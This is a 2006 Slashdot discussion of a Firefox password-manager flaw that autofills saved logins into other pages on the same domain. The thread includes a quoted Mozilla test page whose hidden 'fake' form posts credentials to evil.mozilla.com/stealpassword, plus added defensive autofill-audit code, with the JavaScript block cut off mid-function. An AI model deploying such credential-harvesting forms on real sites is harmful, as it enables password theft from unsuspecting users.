Firefox 2.0 Password Manager Bug Exposes Passwords

kdawson posted more than 7 years ago | from the be-careful-out-there dept.

zbuffered writes, "Today, Mozilla made public bug #360493, which exposes Firefox's Password Manager on many public sites. The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain. For example, username/password input tags on a Myspace user's site will be unhelpfully propagated with the visitor's Myspace.com credentials. It was first discovered in the wild by Netcraft on Oct. 27. As this proof-of-concept illustrates, because the username/password fields need not be visible on the page, your password can be stolen in an almost completely transparent fashion. Stopgap solutions include avoiding using Password Manager and the Master Password Timeout Firefox extension, which will at least cause a prompt before the fields are filled. However, in the original case detailed in the bug report, the phish mimicked the login.myspace.com site almost perfectly, causing many users to believe they needed to log in. A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability, is available from the bug's original author."

315 comments

But but but.... (5, Funny)

Anonymous Coward | more than 7 years ago | (#16941742)

...secure by design!!

I sense a disturbance in the force... (5, Funny)

LordEd (840443) | more than 7 years ago | (#16941786)

...as though millions of Firefox users were laughing at IE users, and were suddenly silenced.

Cue "still more secure" arguments now.

Re:I sense a disturbance in the force... (0, Troll)

0232793 (907781) | more than 7 years ago | (#16941812)

IE has the same problem - RTFA

Re:I sense a disturbance in the force... (4, Interesting)

LordEd (840443) | more than 7 years ago | (#16941902)

I tested the proof of concept attack on IE7 before posting. The attack failed. TFA even says
> RCSR attacks are also actively targeting Microsoft Internet Explorer, however a flaw in Firefox makes the attack much more likely to succeed.
Go RTFA (the proof of concept one) using IE and reply if you get a different result. I didn't try it with IE6.

Re:I sense a disturbance in the force... (2, Informative)

Digitalia (127982) | more than 7 years ago | (#16942202)

I tried it with both IE6 and IE7 and can confirm that on both of the computers I tried, the proof-of-concept page failed.

Many FF fans would say... (5, Insightful)

patio11 (857072) | more than 7 years ago | (#16942506)

... this is just because IE6/7 have poor compatibility with the rest of the world. They can't even support the exploits, anymore, honestly.

OK, jokes aside, someone just released an exploit into the wild which *can't work on IE*. And they presumably still thought they were going to get something of value on it. Hiya, FireFox, welcome to the "visible enough to be a target" club. And it only gets worse. I hope your million bug finding eyes are bright and perky because it only gets worse and it never, ever stops.

RTFA? (2, Funny)

smitty_one_each (243267) | more than 7 years ago | (#16941968)

RTFA?
The hell, you say.
'Tis slashdot, bucko:
No read-read today.
Always for good suds we pray.
Burma Shave

Re:I sense a disturbance in the force... (1)

Zonnald (182951) | more than 7 years ago | (#16942118)

"Note MSIE6|7 do the same." 1 line provided by a user with no information to back it up. Quality citation.

Re:I sense a disturbance in the force... (1)

LordEd (840443) | more than 7 years ago | (#16942360)

Did you try it? Care to make it 2 lines provided with 2 users to back it up?

Or would you prefer the 1 user multi-lined wordy edition?
I, LordEd (user 840443), hereby solemnly swear under penalty of being modded down that my attempt to make the proof of concept page fail was genuine and that the result was an unsuccessful attack.

Dated November 21, 2006 at 4:07 pm (PST).
Witnessed by my cat.
Would you like me to grab the domain heyslashdotitrieditandfoundie6didntfail.com and make a page/blog entry that says it doesn't fail?

Re:I sense a disturbance in the force... (1)

diegocgteleline.es (653730) | more than 7 years ago | (#16942268)

So the fact that your passwords can be stolen not just in IE, but also in Firefox, makes you happier?

Re:I sense a disturbance in the force... (1)

LordEd (840443) | more than 7 years ago | (#16942396)

No, the fact that the passwords were not stolen in IE made me happier. The attack failed (as in was unable to acquire the password).

But if anybody cares, I'm still a Firefox user. I never use the save password feature.

Re:I sense a disturbance in the force... (1)

Fuzzums (250400) | more than 7 years ago | (#16941866)

Nope. I just prefer FF :D

Re:I sense a disturbance in the force... (0)

kevintron (1024817) | more than 7 years ago | (#16942014)

Let's see now. Internet Explorer has numerous gaping security holes, in actual widespread use, that make my own computer vulnerable to intrusion and could even result in malware taking over my system to turn it into a zombie. Firefox turns out to have a flaw that might, in theory, allow someone to pose as me on various web sites.

I'm still laughing at the IE users.

Re:I sense a disturbance in the force... (1)

1trickymicky (924393) | more than 7 years ago | (#16942152)

yeah that was a weak attempt

Re:I sense a disturbance in the force... (1)

diersing (679767) | more than 7 years ago | (#16942608)

Um, I think it's more than a theory; of course there are thousands of practical exploits for MS and IE. No OS or application is immune; it just proves EVERYONE must keep things updated on a regular basis and generally be cautious.

Just 2.0 ? (0)

Anonymous Coward | more than 7 years ago | (#16941760)

is that just for FF2.0 or below ?

Re:Just 2.0 ? (0, Redundant)

Dj Stingray (178766) | more than 7 years ago | (#16942280)

I just ran the test on 1.5.0.8 and I am affected.

Re:Just 2.0 ? (1)

spatley (191233) | more than 7 years ago | (#16942478)

Same here in 1.5.0.2

Re:Just 2.0 ? (0)

Anonymous Coward | more than 7 years ago | (#16942574)

I just ran the test on 1.5.0.7 and I am not affected.
I really tried hard too, allowing scripts to run and even a pop-up window. Maybe it doesn't work the same on Ubuntu.

Re:Just 2.0 ? (2, Interesting)

Svippy (876087) | more than 7 years ago | (#16942552)

Firefox 3.0 does not seem to have the problem. But Firefox 3.0 is still in Alpha. So yeah.

SEE! (-1, Flamebait)

Anonymous Coward | more than 7 years ago | (#16941766)

Firefox can be just as bad, if not worse than IE!
scumbags...

Nelson sez: (-1, Flamebait)

Anonymous Coward | more than 7 years ago | (#16941776)

Haw haw!

passwords have failed (5, Insightful)

hackstraw (262471) | more than 7 years ago | (#16941816)


Now that it's 2006, can we now use a better form of "authentication" than a few ascii characters?

Every website wants you to have a password. You know, for important stuff like making a purchase because you use a password for a purchase at a brick and mortar store, right?

Well, since it's a good practice to use unique passwords, and users get forgetful, then they use the web browser tool to store their passwords, then they forget their passwords, and when they use another computer or update their existing one, their tool does not work, and if it does work, then the browser gives away your passwords.

I don't use a password to get into my home, I don't start my car with a password, I don't use a password to get into my work. In fact, I don't even have a key for my work, server room, nothing (RFID). But all day at work, these programs continually ask for my password to the point that I don't consider my password secure because I have to change it, and use it so much, I'm desensisized (sp?) and say who cares?

Can we get over passwords soon?

Re:passwords have failed (2, Funny)

Anonymous Coward | more than 7 years ago | (#16941980)

Did you have a proposed solution? Or were just cryin' like a little bitch with a skinned knee and shit [imdb.com] ?

Re:passwords have failed (5, Insightful)

AlXtreme (223728) | more than 7 years ago | (#16942060)

> I don't use a password to get into my home, I don't start my car with a password, I don't use a password to get into my work. In fact, I don't even have a key for my work, server room, nothing (RFID).
Locks get picked. Cars get stolen. RFID can be disrupted, tampered with or your card can get stolen (I'm assuming you don't have RFID tags in your arm). Likewise, passwords can be sniffed. Hell, it doesn't matter how good your encryption is, all it takes is a videocamera pointed at your keyboard.

How far you go, it doesn't matter. There will always be a trade-off between security and convenience. Personally, I trust a good lock more than I trust RFID. But even if you go all the way to biometrics, there will always be a way to hack the system.

Even so, this Firefox security flaw is a nasty one.

Re:passwords have failed (1)

Steppman2 (1029992) | more than 7 years ago | (#16942266)

From what I understand you'd still have to hit some form of submit button (fields are hidden but once Firefox fills them in you gotta get them to their server somehow). It seems to me like this kind of thing is an unforeseen natural side effect of anything that automatically fills in your information...Firefox is just doing what it's been told to do on that site, although I fail to see the mass damage here besides a bunch of emo kids getting their MySpace pages defaced since I doubt important sites like financial institutions or government related pages allow any custom content like this. The only thing that would scare me is if a phishing attack could use this to have it automatically entered...now that would be a bug.

Re:passwords have failed (1)

makomk (752139) | more than 7 years ago | (#16942498)

Well, JavaScript could be used to submit the form automatically, but any site that allows JavaScript in user-created content and has logins already has bigger security holes to worry about.

Re:passwords have failed (5, Interesting)

irc.goatse.cx troll (593289) | more than 7 years ago | (#16942070)

I strongly hope so. My recommendation would be public key authentication, the way SSH can do it. You'd need a private key (possibly on a crypto card, but a thumbdrive or floppy or whatever works fine) and a password for that. You authenticate to the key when launching your encryption agent, then any website that wants to verify who you are contacts your agent and does the authentication there.

Infinitely more secure than our current password system, a lot more convenient (think Microsoft Passport's bragged about convenience, except none of your data is stored on a central server), and all around the BetterWay(tm). The main downside is when roaming to another machine: if you don't have your key, you don't have access. This can be addressed with either being able to fall back on a password (removing a lot of the security), or some means of authenticating to your home computer.

You could also add some sort of spec for feeding VCard info into the agent so that sites could use it to do a sort of shared profile feature, where you'd authorize a site to receive certain info and save you a lot of time filling stuff out.

Unfortunately this is just yet another thing on the list of "tech the way I think it should be", not anything on anyone's todo lists.

Re:passwords have failed (1)

Xugumad (39311) | more than 7 years ago | (#16942180)

> The main downside if when roaming to another machine if you don't have your key, you don't have access.

USB flash drives are becoming really popular. Some standard location on a flash drive to place a private/public key pair would mean you could provide credentials just by sitting down at a PC and plugging in your flash drive. Having said that, that then means losing the drive is... really, really bad. Also means a virus infected system could grab your keys, but then that's more or less a risk with passwords anyway.

I suppose, ideally, what we want is a stand alone device that plugs into USB, a PIN is entered into the device to enable it, and it handles all signing requests, with the keys never leaving the device itself. That's getting fairly fiendishly complex, though...

Java ring? (4, Interesting)

CustomDesigned (250089) | more than 7 years ago | (#16942374)

Remember the Java ring? It had a processor and stored the private key in a tamper resistant case (erases instantly when case is compromised). PC programs would ask the Java ring to sign things. A virus could get bogus signatures while it was connected, but couldn't compromise the key. Unfortunately, it used a funky "One Wire" adaptor to get power and talk to a PC. If only they would reintroduce it in a USB format!

Re:Java ring? (1)

mmontour (2208) | more than 7 years ago | (#16942694)

> Unfortunately, it used a funky "One Wire" adaptor to get power and talk to a PC. If only they would reintroduce it in a USB format!

They do sell USB adapters for iButtons - see http://www.maxim-ic.com/products/ibutton/products/adapters.cfm [maxim-ic.com]. However it looks like the crypto iButton itself has been discontinued. I hope that someone does release a similar product in the future, before the battery dies in the one I am currently using.

Re:passwords have failed (1)

Xugumad (39311) | more than 7 years ago | (#16942082)

Yes! I'd love to see Firefox adapted to make client side certificates trivial (keep in mind that there's no need for the server to know that the client certificate is who it says it's from, only that the same certificate is always the same person), and more sites move to using SSL certificate authentication. For, y'know, useful things like never actually providing re-usable credentials to the server...

Re:passwords have failed (4, Insightful)

Crudely_Indecent (739699) | more than 7 years ago | (#16942246)

Passwords work great for me. I, however, use them with care.

Any site that uses financial information (my bank, eBay, PayPal, Amazon, or whatever I'm buying, my own servers, etc.) doesn't get the password stored in any form of password manager. On the other hand, inconsequential services like news sites, LUG sites, aquarium discussion groups and the like may have the passwords stored. If it's important, don't store it, don't write it on a post-it note, don't tell your friends.....people cannot be trusted.

It seems that any security protocol can be circumvented by exploiting the end users who use them poorly or rely on something other than common sense for security.

It took all of about 5 minutes to explain phishing to my girlfriend. Now, she's almost 1/104358506th as paranoid as I am, which is a good start.

Now, I'm out of tinfoil......off to the store.

Re:passwords have failed (1)

peragrin (659227) | more than 7 years ago | (#16942436)

The bigger problem is automatic passwords for websites. I never understood why such a feature would be installed. It's far safer to use a third party app, and look up the passwords as you need them. I can remember some but not all of mine, but all I need to remember is three.

One to log onto my machine. One to decrypt an encrypted filesystem, and the third is for the application in which I store the information. With OS X I can literally click twice, type in both passwords and can look up the forgotten password in 10 seconds. Closing the app and I can unmount the filesystem later.

I know such a thing is available under both windows and Linux. Why don't more people use it?

Re:passwords have failed (1, Funny)

Anonymous Coward | more than 7 years ago | (#16942446)

I know! Let's use a centralized auth. server! We will name it Passport!!! [wikipedia.org] - ...damn never mind

Is it used? (5, Insightful)

oyenstikker (536040) | more than 7 years ago | (#16941818)

People actually let their browsers remember their passwords? I have never trusted my browser that much.

Re:Is it used? (2, Funny)

wumpus188 (657540) | more than 7 years ago | (#16941966)

That's what this new service is for. Let others remember your passwords!

Re:Is it used? (1)

crabpeople (720852) | more than 7 years ago | (#16942030)

Well considering the first time you enter form information FF prompts you to "Save information so you don't have to type it again", well what clueless luser wouldn't do that? Lusers hate to type!

Saving passwords should not be a browser feature. I am ashamed that such a big bug could make it into Firefox. Hopefully staying on 1.5 and not using any sort of "password management" (except cookies) will keep me safe from this. At least it will probably be fixed today, if it hasn't already been fixed.

Not a lot of better options (4, Insightful)

Kadin2048 (468275) | more than 7 years ago | (#16942068)

If you have 50-100 passwords at various sites, established over years, there's really a shortage of other good options. You can go the old-school route and just write them all down on a pad of paper, or the slightly more sophisticated route and put them in a text file or encrypted database on your local machine, but that doesn't help you when you want to log into a site from another machine.

I was disappointed to hear of this vulnerability, because I use Google Browser Sync pretty heavily for keeping track of cookies and trivial passwords, and to be honest I'm not really sure what I'd do without it. More important passwords I keep in an old Palm Pilot using a GPLed password-management and generation program on it, but recalling passwords from it is a pain (takes several minutes to get Palm out, type in master password, etc.).

Re:Not a lot of better options (1)

Bogtha (906264) | more than 7 years ago | (#16942294)

> I was disappointed to hear of this vulnerability

I was puzzled to hear of this vulnerability. I am certain this exact topic has come up before in relation to saving passwords, over a year ago. I thought it was going to be addressed by making the forms non-submittable by JavaScript, and giving the input fields fake blank values when JavaScript read them - of course, only when the form information was automatically entered by the browser.

Did I just imagine all that, or can somebody else confirm this is a long-established problem?

Re:Is it used? (3, Interesting)

Firehed (942385) | more than 7 years ago | (#16942134)

It's not your own browser to worry about. It's others' browsers. My roommate decided to borrow my machine and was stupid enough to have Firefox remember his password on my machine to the main school portal. No biggie, except that the 'reveal all passwords' button exists (and, last I checked, required no authentication to use).

Of course, the truly telling moment was when I found out how lame his password is. Not that I'd expect anything different from someone dumb enough to store their password on someone else's computer in the first place.

So, in other words, passwords continue to be useless for people dumb enough to leave them lying around. I've used the same password for years and it's by no means secure (only just a bit more secure than using my first name) but it's never been an issue for me. The only time I've been concerned is when websites force me to come up with something that fits their requirements, because that means that I do end up writing it down somewhere. The sooner webmasters realize that setting specific requirements for passwords makes them less secure (my bank requires an alphanumeric PW 6-8 letters long with mixed case - that massively narrows down a brute force attack), the better. In the end, most of it comes down to user stupidity, so we might as well not limit the complexity of good users or force them to use something too obscure to remember (or, worse, say 'write this down in a place you can easily access').

Re:Is it used? (4, Informative)

Odiumjunkie (926074) | more than 7 years ago | (#16942566)

> No biggie, except that the 'reveal all passwords' button exists (and, last I checked, required no authentication to use).

Firefox, for as long as I can remember, has allowed you to set a master password, without which the password manager will not populate any password fields and will not allow the viewing of any stored passwords.

Re:Is it used? (1)

geekoid (135745) | more than 7 years ago | (#16942754)

"the truly telling moment was when I found out how lame his password is. "

so, what was it?

Opera Vulnerable? (1)

JordanL (886154) | more than 7 years ago | (#16942204)

Does anyone know if this attack is possible on Opera? Opera's wand has been around longer than FireFox has, so I'm kinda curious. It seems like something people could exploit in more than just FireFox.

Re:Is it used? (1)

EvanED (569694) | more than 7 years ago | (#16942418)

I use it all the freaking time. I don't want to be constantly entering my password. I'm lazy.

Now, granted, my computer doesn't remember my bank password for instance... I enter that each time. (I don't even know it... it's a ~14 character, randomly generated password stored in a PasswordSafe database.) But for sites like /., you betcha that Firefox knows my password.

Re:Is it used? (4, Interesting)

makomk (752139) | more than 7 years ago | (#16942578)

I use Konqueror/KWallet to remember most of my passwords. It's encrypted (requires a password to access), only fills in the forms on the page you originally hit "Save Password" on (inconvenient, but helps reduce the security issues), and closes the wallet (requiring re-entry of the password) when I lock my screen, my screensaver starts up, or after 10 minutes of non-use of the wallet. Slightly paranoid compared to Firefox, but it works.

Re:Is it used? (1)

kosmosik (654958) | more than 7 years ago | (#16942756)

Yeah I do. It is like I use the Web a lot. Think SlashDot, think Del.Ic.iosus..whateva think whatever little forum or not so important web service. I do store the password in browser. What else do you suggest? Remembering 100+ different passwords maybe is possible for me but I've got better things to do. :)

I use quite common scheme - I don't care about remembering my passwords at all if they are related to not so critical things like my Slashdot account, Bugzilla account for project Foo etc. etc. - I generate random passwords for these accounts and let my browser remember it.

For more critical stuff I use keys/keychain (like remote login to servers) or I have few passwords that I really remember (bank account, eBay etc.).

Isn't it like all people do?

just update it? (1)

diegocgteleline.es (653730) | more than 7 years ago | (#16941822)

Stopgap solutions are not a solution, I guess they're planning a 2.0.1 soon? The bug was reported 10 days ago...

This just in... (0)

Anonymous Coward | more than 7 years ago | (#16941826)

Firefox 2.1 released, with new and improved stability, affordability, portability, extendability, pluginability, and securability.

Arrrrr (3, Insightful)

Peyna (14792) | more than 7 years ago | (#16941834)

> The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain.

Worst idea ever. The question isn't why wasn't this discovered earlier, but who decided this was a good idea in the first place?

Re:Arrrrr (1)

LunaticTippy (872397) | more than 7 years ago | (#16941934)

Agreed. I've had to help too many people who use autofill passwords and don't know the passwords when they change machines or use another pc. I avoided the whole thing because it seemed likely to allow me to forget passwords, and didn't seem totally secure.

Re:Arrrrr (1)

sweatyboatman (457800) | more than 7 years ago | (#16941974)

actually this is a great idea for all those stupid sites that require you to have a user-name and password for no particular reason. With FF I can put in whatever garbage info I want for the registration and it will remember the login for me next time I load the page. Obviously, for important sites (e.g. not a myspace account) I tell FF to not remember the password.

Yes, this vulnerability is a problem and needs to be fixed, but let's not throw the baby out with the bathwater.

And for you, Mr-I-Dont-Like-It, you can just turn the feature off.

Re:Arrrrr (1)

Peyna (14792) | more than 7 years ago | (#16942240)

It's a good feature when it works only for each site. But why should it be taking what I put in at gmail to log in and sticking that login/password into some other site? That's the problem.

Re:Arrrrr (1)

LunaticTippy (872397) | more than 7 years ago | (#16942718)

I end up using different computers enough that this would be an inconvenience. I'd be ok until I was somewhere that didn't know my passwords, then I'd have to go through the unpleasant retrieval process just to post to slashdot.

I also don't want to cultivate habits that'd give out my password to firefox on whoever's machine I'm on.

Re:Arrrrr (4, Insightful)

jesser (77961) | more than 7 years ago | (#16942172)

When browsers added password management features 5 (?) years ago, there weren't a lot of sites that required passwords, included user-generated content, and allowed that user-generated content to include password fields. But there were (and still are) many sites where loading just about any URL on the site could give you a "you need to log in" page.

I'd be perfectly happy with this becoming part of the accepted security model for web applications, just like "don't let user-generated content include SCRIPT tags with arbitrary content".

Re:Arrrrr (1)

(H)elix1 (231155) | more than 7 years ago | (#16942442)


>>The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain.

>Worst idea ever. The question isn't why wasn't this discovered earlier, but who decided this was a good idea in the first place?


Well, if they read /., it would seem the site is it.slashdot.org, games.slashdot.org, and a mess of other sub-domains. I can see why they might think subdomain 'sharing' was a good idea. Logging in on my blackberry is a real treat if I flush the passwords.

Not just Firefox 2.0, also IE6/7 and earlier F'fox (4, Informative)

Andy_R (114137) | more than 7 years ago | (#16941870)

According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.

So much for me being smug about going back to Firefox 1.5!

Re:Not just Firefox 2.0, also IE6/7 and earlier F' (1)

quantaman (517394) | more than 7 years ago | (#16942176)

I'm running 1.5 and the exploit worked for me.

stopgap measures include... (3, Funny)

Gary W. Longsine (124661) | more than 7 years ago | (#16941876)

...using Microsoft Internet Explorer. AAaaaaaaaaaaaargh!

Re:stopgap measures include... (1)

Constantine Evans (969815) | more than 7 years ago | (#16941954)

According to the bugzilla link, IE 6 and 7 are also affected.

Re:stopgap measures include... (1)

Zonnald (182951) | more than 7 years ago | (#16942292)

IE6 didn't even ask to save password - no problems here - walks away.

Yeah, but... (0)

Anonymous Coward | more than 7 years ago | (#16942554)

...IE 6 is such shite, you'd WANT to walk away...

Re:stopgap measures include... (1)

fireman sam (662213) | more than 7 years ago | (#16941976)

Stop the gap, by knocking down the building

Re:stopgap measures include... (0)

Anonymous Coward | more than 7 years ago | (#16942162)

... using another browser. Doesn't have to be IE. Netscape (8.1.2) and Opera (9.0.1) both survived the proof-of-concept. Not sure about Konqueror or Safari, since I'm at work.

What an incredible gaffe (0)

Digitalia (127982) | more than 7 years ago | (#16941886)

It is absolutely shocking that such a serious bug would be discovered in Firefox. This is why I was reluctant to upgrade to 2.0 when it first came out. Sadly, I bit the bullet and upgraded anyways.

Unfortunately, the dev team has shown its fallibility in one of the most idiotic ways possible. If they resolve the problem quickly, they may be absolved of their negligence. Otherwise, it will be difficult to continue advocating for Firefox as vocally as I have in the past.

Re:What an incredible gaffe (2, Informative)

Andy_R (114137) | more than 7 years ago | (#16942026)

Of course it's far less shocking that the same bug is present in IE6 and IE7! I wonder which browser you will be recommending... do you know of one that passes the test-case linked to from the bugzilla page?

Re:What an incredible gaffe (2, Interesting)

Digitalia (127982) | more than 7 years ago | (#16942108)

I tested IE6 and IE7 and the proof of concept page failed to work in both browsers. Neither browser passes the stored browser on to Google.

Have you personally tested this and found either browser to be vulnerable?

Re:What an incredible gaffe (1)

vertinox (846076) | more than 7 years ago | (#16942132)

Perhaps there is code to not work if it detects the User Agent for anything other than FF2.0?

Re:What an incredible gaffe (1)

Zonnald (182951) | more than 7 years ago | (#16942332)

Absolutely, because the folks at bugzilla so want to show that IE6/7 are better browsers than MSIE.

Did you even look at the source?

bug 360493
  1. Enter real name and real password and submit real form.
  2. Choose Remember this password.
  3. Submit fake form
  4. Test fails if evil.mozilla.com gets real password
real name real password
fake name fake password

Re:What an incredible gaffe (1)

Zonnald (182951) | more than 7 years ago | (#16942364)

Damn. I didn't expect that using a blockquote wouldn't leave the HTML intact ...
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>bug 360493</title>
</head>
<body>
<ol>
<li>Enter real name and real password and submit real form.</li>
<li>Choose Remember this password.</li>
<li>Submit fake form</li>
<li>Test fails if evil.mozilla.com gets real password</li>
</ol>
<div>
<form name="real" action="#" method="get">
<div>
real name <input name="name" type="text" />
real password <input name="password" type="password" />
<input type="submit" value="real form"/>
</div>
</form>
</div>
<div>
<form name="fake" action="http://evil.mozilla.com/stealpassword" method="get">
<div>
fake name <input name="name" type="text" />
fake password <input name="password" type="password" />
<input type="submit" value="fake form" />
</div>
</form>
</div>
</body>
</html>
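
Added example, not part of the thread and not Mozilla's code: a Python model of the form-filling decision, run over the two forms from the test case quoted above, comparing the same-site match described in the summary with a stricter rule that also checks where the form submits. The hosting URL `site.example`, the `SavedLogin` record and both policy functions are assumptions made for illustration.

```python
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the two forms from the quoted test case, trimmed.
PAGE_URL = "https://site.example/profile/page.html"  # hypothetical hosting page
SAMPLE_HTML = """
<form name="real" action="#" method="get">
  <input name="name" type="text" />
  <input name="password" type="password" />
</form>
<form name="fake" action="http://evil.mozilla.com/stealpassword" method="get">
  <input name="name" type="text" />
  <input name="password" type="password" />
</form>
"""


def origin(url):
    """Return (scheme, host, port) for a URL, filling in default ports."""
    parts = urlsplit(url)
    port = parts.port or {"http": 80, "https": 443}.get(parts.scheme)
    return (parts.scheme, (parts.hostname or "").lower(), port)


@dataclass
class Form:
    name: str
    action: str               # absolute URL the form submits to
    has_password: bool = False


class FormCollector(HTMLParser):
    """Collect every <form> and note whether it holds a password input."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing, empty or "#" action submits back to the page itself.
            action = urljoin(self.page_url, a.get("action") or "")
            self._current = Form(a.get("name") or "", action)
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current.has_password = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


@dataclass(frozen=True)
class SavedLogin:
    """Hypothetical password-manager record (an assumption, not a real format)."""
    page_origin: tuple     # origin of the page where the login was saved
    action_origin: tuple   # origin the original login form submitted to


def fill_host_only(login, page_url, form):
    """Weak policy: fill any password form served from the saved site."""
    return form.has_password and origin(page_url) == login.page_origin


def fill_action_checked(login, page_url, form):
    """Stricter policy: the form must also submit to the saved origin."""
    return (fill_host_only(login, page_url, form)
            and origin(form.action) == login.action_origin)


def audit(page_url, html):
    """Report, per password-bearing form, what each policy would do."""
    parser = FormCollector(page_url)
    parser.feed(html)
    # Assume the login was saved from a form that posted back to this site.
    login = SavedLogin(origin(page_url), origin(page_url))
    report = {}
    for form in parser.forms:
        if not form.has_password:
            continue
        report[form.name] = {
            "host_only": fill_host_only(login, page_url, form),
            "action_checked": fill_action_checked(login, page_url, form),
            # Also useful when screening user-generated content on a site.
            "posts_off_origin": origin(form.action) != origin(page_url),
        }
    return report


if __name__ == "__main__":
    for name, verdict in audit(PAGE_URL, SAMPLE_HTML).items():
        print(name, verdict)
```

The `posts_off_origin` flag is the same test a site could apply to user-submitted markup before publishing it.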

Re:What an incredible gaffe (2, Insightful)

ResidntGeek (772730) | more than 7 years ago | (#16942124)

Right, because you contribute to Firefox, right? If you did, you'd of course have been able to spot this bug with your razor-sharp eyes, right? Oh wait... no, I just remembered you're fallible too, and quite possibly an idiot. Firefox is free. The dev team doesn't have to do shit, they choose to. Stop acting like an entitled 8-year-old at Christmas, and do something useful with your time.

Re:What an incredible gaffe (1)

Digitalia (127982) | more than 7 years ago | (#16942378)

If we follow your flawed logic to its conclusion, you're arguing that an open source project should be immune from criticism because it's charity. Do you think that open source contributors should not be accountable for major security screw ups?

Firefox may be free. However, its developers are just as accountable for their mistakes as Microsoft should be for its own. Firefox gained the market share that it has because of a reputation for security. When the dev staff screw up so badly, it does a lot to erode their reputation. Though I may not contribute to the project, I have a right as an end user to expect a relatively secure product. The occasional, obscure buffer overflow exploit is excusable. A massive flaw in conception, design, and execution is certainly not.

I think that you've misunderstood not only my initial post but also the fundamental philosophy behind the open source movement. If every developer thought as you did, no end users would bother to use your goods. Judging from your haughty demeanor, I suspect you consider this a good thing.

Re:What an incredible gaffe (1)

PastAustin (941464) | more than 7 years ago | (#16942226)

It would seem sort of silly to me to stop advocating Firefox because it has one BIG bug. Most browsers have 100 HUGE bugs. It is still better than any other browser.

I wouldn't think this would be a hard fix. Silly Firefox development team. =)

What an incredible retard you are (0)

Anonymous Coward | more than 7 years ago | (#16942408)

IDIOT. IE6, IE7, FF1.5, FF2.0, Opera all affected. So what browser is someone like you using up there on your high fucking horse?

Re:What an incredible retard you are (0)

Anonymous Coward | more than 7 years ago | (#16942480)

IDIOT. IE6 and IE7 definitely not affected. So why are you such a retard?

i used that one (0, Troll)

User 956 (568564) | more than 7 years ago | (#16941918)

A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability

I used that one on my girlfriend. I believe it's also called the "Dirty Sanchez".

Re:i used that one (1)

Zonnald (182951) | more than 7 years ago | (#16942410)

Actually the word is "Filthy".

the bug's original author (0)

Anonymous Coward | more than 7 years ago | (#16941926)

Why didn't he just code it right to start with

>:(

Meh ... (1)

Purity Of Essence (1007601) | more than 7 years ago | (#16941930)

My feeling is, people who rely on "password managers" get what they deserve when their passwords end up in the wrong hands. It's generally just a bad idea to store passwords anywhere but your head.

Re:Meh ... (1)

Jamu (852752) | more than 7 years ago | (#16942690)

If I used my head to store passwords, I doubt anyone would get them. Including me.

Re:Meh ... (1)

Propaganda13 (312548) | more than 7 years ago | (#16942760)

I don't know about the deserve part, but this is one of the reasons I don't use password managers. Another one is that when you don't type in passwords, you're more likely to forget them so if the password manager gets corrupted, deleted, infected, etc. then you're SOL.

For most home users, a paper with passwords written on it is safer in the long run. Preferably the paper is not in plain sight or stuck to the monitor.

Dissatisfied with v2.0 (3, Informative)

macdaddy (38372) | more than 7 years ago | (#16941984)

I don't know about everyone else but I am generally dissatisfied with v2.0. Frankly I felt that the memory leak in FF was significantly amplified in 2.0. I noticed back on 1.5 that every time I put my laptop into standby with FF running and then woke it up that FF would slowly increase its memory consumption to about 30% more than what it was before being put into standby. I.e., if it was 100MB when it went to standby it would be around 130MB after waking the laptop, switching focus to FF, and clicking through my opened tabs. In FF 2.0 I have to literally shutdown FF every day or two or FF will easily consume upwards of 500MB of my RAM. I usually have about a dozen windows open and in each window I have 5-15 tabs. That's a fair bit but it didn't cause me much grief in v1.5.

It also took me a while to figure out how to remove the close button from each tab [wordpress.com]. The tab scrolling "feature" was also a point of great annoyance that took up more of my time to find a fix [lifehacker.com].

In short I'm just not jumping for joy over FF. This new flaw happens to come to light the day after I search Google for a way to manually add userids and passwords to the FF DB (any ideas?). This was to address the problem of FF not picking up some text fields as userid and password fields. One solution I found was RoboForm [roboform.com], though I'm not sure I want to pay for what I think should be a fairly easy thing to do inside FF. FF is getting better but personally I'd rather be using Mozilla 1.7.x.

I Love FF BUT it's not in the spirit of OS (1)

GenKreton (884088) | more than 7 years ago | (#16941996)

I love firefox and am very thankful for it being opensource but I loathe how Mozilla chooses to track and report bugs. I have been going around for days and could've been exploited - possibly but not probably - instead of being able to take appropriate measures to protect myself. It's not like this was some little secret; the code was already out in the wild to do it. I find this security through obscurity in opensource projects absolutely disgusting. While we are possibly getting compromised they are sitting on their hands. We, the community, are here to quickly fix problems like these too. Thousands of developers who the bug was hidden from could've and would've worked on this. This makes the development process absolutely useless...

Sounds more like a bug in myspace (2, Insightful)

SlightlyMadman (161529) | more than 7 years ago | (#16942010)

I thought the rule of thumb for any user-created content was to never allow freeform html? You either let them control their formatting with a separate markup (like BBCode), or you limit them to specific tags (like they do here). In neither of these situations is this exploit possible.

Allowing full html coding, including embedding java or javascript, is an invitation for the unscrupulous. That's one of the 500 reasons I can think of to never visit a website like myspace.

That said, much like language, the web is defined by its users. While I don't feel like it's Firefox's responsibility to fix issues like this, they'd do best to be aware of it. It wouldn't be a bad idea at all to tie password remembering to the exact url (at least everything up to the "?") by default.
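The policy suggested in the comment above (key the saved login to the page URL up to the "?"), combined with a check on where the form submits, as an added example that is not part of the original post or of Firefox's code. The names `savedLogin`, `pageKey` and `shouldAutofill` and the `.test` hosts are assumptions made for illustration.

```javascript
// Added illustration; savedLogin, pageKey and shouldAutofill are hypothetical names.

// "Everything up to the ?": origin plus path, no query string or fragment.
function pageKey(url) {
  const u = new URL(url);
  return u.origin + u.pathname;
}

// Decide whether a saved login may be filled into a form found on pageUrl
// whose action attribute is formAction (empty means "submit to this page").
function shouldAutofill(savedLogin, pageUrl, formAction) {
  try {
    const target = new URL(formAction || "", pageUrl);
    if (pageKey(pageUrl) !== pageKey(savedLogin.pageUrl)) {
      return { fill: false, reason: "different page" };
    }
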